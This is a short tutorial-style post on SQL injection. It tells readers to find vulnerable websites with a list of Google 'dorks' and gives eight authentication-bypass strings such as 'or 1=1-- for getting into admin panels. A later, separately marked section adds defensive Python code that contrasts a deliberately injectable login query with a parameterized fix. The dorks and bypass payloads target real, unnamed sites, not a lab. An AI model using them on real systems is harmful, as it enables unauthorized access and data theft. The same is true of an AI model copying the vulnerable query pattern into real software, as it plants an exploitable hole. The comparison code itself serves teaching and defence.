What's a SQL injection?
Some SQL dorks and SQL strings...
- In a typical SQL injection attack, an attacker can bypass authentication, access or modify your data, and delete data in a database without your permission.
- In some cases, SQL injection can also be used to execute commands on the operating system.
- In particular, SQL injection allows an attacker to escalate to more damaging attacks inside a network or database.
Now we need to know what a database and a database management system are...
Database:
A database is a systematic collection of data. Databases support the storage and manipulation of data. Where databases are more complex, they are often developed using formal design and modeling techniques. A database makes data management easier.
Database management system:
It's a collection of programs that enables the user to access, modify and manipulate data easily and in a systematic way.
Now we have to know how to use them...
First of all, we have to find vulnerable websites using some SQL dorks, which are given below...
1. inurl:".php?cmd="
2. inurl:".php?z="
3. inurl:".php?q="
4. inurl:".php?search="
5. inurl:".php?query="
6. inurl:".php?searchstring="
7. inurl:".php?keyword="
Some SQL strings that are used to log in to an admin panel are given below...
'or 1=1--
"or 1=1--
Or 1=1--
'or'a'='a
"or"a"="a
'or''='
'=''or'
')or=('a'='a
You can check out these dorks and strings at this link.
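Why strings like these get past a login check, and the fix that stops them, as an added example that is not from the original post: a login query built by string concatenation beside the same query using bound parameters. The table, column names, credentials and function names are assumptions made for this example, run against an in-memory SQLite database.

```python
import sqlite3

def make_db():
    # Constructed sample data; the table and column names are assumptions.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, password TEXT)")
    # Plaintext password only to keep the example short; store salted hashes in practice.
    db.execute("INSERT INTO users VALUES ('admin', 's3cret-constructed')")
    return db

def login_vulnerable(db, name, password):
    # Input is pasted into the SQL text, so a quote in it closes the string
    # literal and the rest of the input is parsed as SQL.
    query = ("SELECT name FROM users WHERE name = '%s' AND password = '%s'"
             % (name, password))
    try:
        return db.execute(query).fetchone() is not None
    except sqlite3.Error:
        return False  # the input produced malformed SQL

def login_parameterized(db, name, password):
    # Placeholders pass the input as data; it is never parsed as SQL.
    query = "SELECT name FROM users WHERE name = ? AND password = ?"
    return db.execute(query, (name, password)).fetchone() is not None

# Three of the single-quote strings from the list above.
PAGE_STRINGS = ["'or 1=1--", "'or'a'='a", "'or''='"]

def compare(db):
    """Map each string to (vulnerable result, parameterized result),
    with the string supplied as both inputs."""
    return {s: (login_vulnerable(db, s, s), login_parameterized(db, s, s))
            for s in PAGE_STRINGS}

if __name__ == "__main__":
    db = make_db()
    for s, (weak, fixed) in compare(db).items():
        print(f"{s!r:14} concatenated={weak} parameterized={fixed}")
```

With bound parameters the input is compared as a literal value, so the quote characters have no effect on the query's structure.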